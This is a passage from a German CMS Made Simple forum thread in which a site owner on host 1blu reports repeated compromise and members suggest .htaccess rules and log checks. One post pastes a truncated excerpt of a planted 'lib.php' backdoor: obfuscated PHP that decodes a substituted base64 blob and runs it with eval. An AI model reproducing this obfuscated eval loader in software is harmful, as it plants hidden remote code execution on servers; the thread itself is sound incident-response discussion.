Du bist nicht angemeldet. Der Zugriff auf einige Boards wurde daher deaktiviert.

#26 01. Oktober 2015 12:59

FCOe
hat von CMS/ms gehört
Registriert: 07. September 2015
Beiträge: 11

Re: 1blu --> Angriff über CMS Made Simple

Ich habe keine Root-Rechte!

Die ersten zwei angeführten Dateien sind in meinem letzten Backup nicht enthalten!
Die "lib.php" sieht komisch aus........

Ausschnitt:

<?php
function qmmd($nns, $ngapjkwe){$jh = ''; for($i=0; $i < strlen($nns); $i++){$jh .= isset($ngapjkwe[$nns[$i]]) ? $ngapjkwe[$nns[$i]] : $nns[$i];}
$li="base64_decode";return $li($jh);}
$xoedl = dIOL5GSb1edTHaGYc8SYeaNM1YcCKvZGjvtVUtVu5zZVesXO7R6qhISqeaGYc8SYcYcCKguVUtV'.
'u5zZVesXO7R6qhzA2eaG21zXD7IOMhOSw5zDOHYt6FRPJRP4b1ero7IOW1GSC5zDV7R6ty'.
'jCyR8O8yIObcaGwyRroBwGlGPGlylPyitTHHASjrGHzrGHhHD4KBASjrBNIHDw6Elu30YKJK'.
'uTHHASjrGHzrGHhHDHAjBSBrGS4rvrlHDw6Elu3FjKs0puLFR2NKpCyRzO8yRAOhe4wil6PeDXABO1ABOCqlArBBASxew1EBO'.
'p5R6Pew1HjvGjKIAbKRrn1eP6Ej26HI1VhIBVR6OJR6PH5zxTKeXwcq4McY6P18OC1GCqh8AW1l770Ru308Vt1YKVydTHReCyR'.
'dPHHI1VhIGLxzDOKgw6xzNw1eHohzApc8SbyRr85zNOzY7LxzDOHDwVUtTHRdPP18OC1zZ9hzB6El4L7zDoh'.
'zApc8SbyRr85zNOh8AW......................................

usw.usw..........

$uf = Array('1'=>'Z', '0'=>'L', '3'=>'i', '2'=>'4', '5'=>'a', '4'=>'B', '7'=>'d', '6'=>'g', '9'=>'h', '8'=>'m', 'A'=>'F', 'C'=>'s', 'B'=>'U', 'E'=>'P', 'D'=>'1', 'G'=>'V', 'F'=>'M', 'I'=>'G', 'H'=>'J', 'K'=>'I', 'J'=>'7', 'M'=>'v', 'L'=>'u', 'O'=>'l', 'N'=>'x', 'Q'=>'H', 'P'=>'k', 'S'=>'9', 'R'=>'C', 'U'=>'O', 'T'=>'o', 'W'=>'t', 'V'=>'p', 'Y'=>'y', 'X'=>'N', 'Z'=>'5', 'a'=>'2', 'c'=>'c', 'b'=>'z', 'e'=>'X', 'd'=>'Q', 'g'=>'D', 'f'=>'q', 'i'=>'e', 'h'=>'b', 'k'=>'6', 'j'=>'T', 'm'=>'8', 'l'=>'S', 'o'=>'f', 'n'=>'r', 'q'=>'n', 'p'=>'j', 's'=>'3', 'r'=>'R', 'u'=>'A', 't'=>'w', 'w'=>'0', 'v'=>'E', 'y'=>'K', 'x'=>'Y', 'z'=>'W');
eval(qmmd($xoedl, $uf));?>

Offline

#27 01. Oktober 2015 13:01

NaN
Moderator
Ort: Halle (Saale)
Registriert: 09. November 2010
Beiträge: 4.079

Re: 1blu --> Angriff über CMS Made Simple

Wenn ich mir die Verzeichnisse anschaue, dann sind das alles Verzeichnisse in denen man keinen direkten Zugriff auf php-Dateien haben muss. Ergo: .htaccess-Datei anlegen und den direkten Zugriff auf php-Dateien sperren. Werde demnächst meine Beispiel-htaccess-Datei in meiner Signatur entsprechend anpassen. Dazu muss ich aber erstmal genau prüfen, auf welche Dateien man im Backend Zugriff haben muss.

Offline

#28 01. Oktober 2015 13:41

FCOe
hat von CMS/ms gehört
Registriert: 07. September 2015
Beiträge: 11

Re: 1blu --> Angriff über CMS Made Simple

@cyberman: nein, es läuft nur CMS Made Simple!

Offline

#29 01. Oktober 2015 19:01

faglork
CMS/ms-Profi
Ort: Fränkische Schweiz
Registriert: 15. Dezember 2010
Beiträge: 1.150
Webseite

Re: 1blu --> Angriff über CMS Made Simple

Du siehst doch, wann die Dateien erzeugt wurden.

Schau halt mal in dein access_log, anhand von Datum und Uhrzeit kannst du doch sehen wer da was getrieben hat.

Servus,
Alex

Offline

#30 06. Oktober 2015 07:06

FCOe
hat von CMS/ms gehört
Registriert: 07. September 2015
Beiträge: 11

Re: 1blu --> Angriff über CMS Made Simple

Weiter zum Thema des permanenten Angriffs.
Es scheint in der Tat, ein Angriff über "root"-Rechte zu sein. Jemand sperrt kurzzeitig (ca. 1h) den Zugriff via FTP und spielt die oben teilweise gelistete Datei in einem beliebigen Verzeichnis und wechselnden Namen auf. Wenn diese gelöscht ist, sieht man in der Log-Datei den permanenten Versuch auf diese zuzugreifen, mit nun entsprechenden Fehlercode 404.
Ist die Datei noch nicht gelöscht, sieht man den Statuscode 200 aber auch gelegentlich 500!
Der Zugriff erfolgt über wechselnde IP's.
Wir haben nun nochmals den Support aufgefordert, nach Lücken im "Root"-Bereich zu suchen!
Man ist auf Antwort gespannt!

Offline

#31 06. Oktober 2015 07:25

NaN
Moderator
Ort: Halle (Saale)
Registriert: 09. November 2010
Beiträge: 4.079

Re: 1blu --> Angriff über CMS Made Simple

Unabhängig davon, was passiert, wenn Du eine .htaccess-Datei in diesen Verzeichnissen anlegst und den Zugriff auf PHP-Dateien sperrst?
Dann dürfte doch in den Access-Logs immer der Statuscode 403 auftauchen.
Das schließt zwar die Lücke nicht, verhindert aber, dass der Code, der da hochgeladen wird, ausgeführt werden kann.

Offline

#32 06. Oktober 2015 08:12

nockenfell
Moderator
Ort: Lenzburg, Schweiz
Registriert: 09. November 2010
Beiträge: 2.807
Webseite

Re: 1blu --> Angriff über CMS Made Simple

Die .htaccess Datei wäre ein zusätzlicher Indikator wie der Zugriff erfolgt. Wenn die .htaccess Datei (ideal mit CHMOD 444) verändert wurde, ist der Angriff eher per Root-Rechte erfolgt denn per PHP Script.

Schliesse in der .htaccess die Ausführung aller PHP Dateien ausser der index.php aus. Damit dürfte sich einiges absichern lassen. Die Vorlage von NaN bringt hier bereits alle Voraussetzungen mit.


[dieser Beitrag wurde mit 100% recycled bits geschrieben]
Mein Blog  /   Diverse Links rund um CMS Made Simple
Module: btAdminer, ToolBox

Offline

#33 06. Oktober 2015 09:08

NaN
Moderator
Ort: Halle (Saale)
Registriert: 09. November 2010
Beiträge: 4.079

Re: 1blu --> Angriff über CMS Made Simple

Schliesse in der .htaccess die Ausführung aller PHP Dateien ausser der index.php aus.

Nee, denn wenn der Angreifer clever ist, nennt er sein Script einfach index.php und dann ist die Türe wieder offen wink
In den Verzeichnissen, die FCOe genannt hat, braucht man keinen Zugriff auf php-Dateien. Da haben php-Dateien mitunter auch überhaupt nichts zu suchen. Auch keine index.php.

Offline

#34 06. Oktober 2015 09:27

cyberman
Moderator
Ort: Dohna / Sachsen
Registriert: 13. September 2010
Beiträge: 6.825
Webseite

Re: 1blu --> Angriff über CMS Made Simple

FCOe schrieb:

Jemand sperrt kurzzeitig (ca. 1h) den Zugriff via FTP

Da scheint aber jemand sehr konkrete Systemkenntnisse zu haben hmm ... und wenn er dazu in der Lage ist, dann hat er den Server gehackt und nicht nur deinen Host.

Du könntest mal schauen, welche Domains noch auf dem Host deines Servers laufen (http://www.ipneighbour.com/) und dann bei den Nachbarn versuchen, auf ähnliche Dateien zuzugreifen. Das Angriffsmuster kennst du ja ...


1. Wie bekomme ich hier schnelle Hilfe?
2. HowTo: Fehlersuche bei CMS/ms
---
„First they ignore you, then they laugh at you, then they fight you, then you win.“ Mahatma Ghandi

Offline

#35 07. Oktober 2015 09:04

FCOe
hat von CMS/ms gehört
Registriert: 07. September 2015
Beiträge: 11

Re: 1blu --> Angriff über CMS Made Simple

Nachdem ich nochmals alles gecheckt habe und noch eine Änderung in der .htaccess durchgeführt habe (Dank an Alle für die Tipps!) ist nun folgender aktueller Stand!
Nach Löschung der entsprechenden Dateien und Nachricht an den Support hörten die Angriffe nach ca. 1,5 h schlagartig auf! Da hat wohl jemand das Loch bei 1blu gestopft!
Nun warte ich mal auf eine Antwort vom Support!

Offline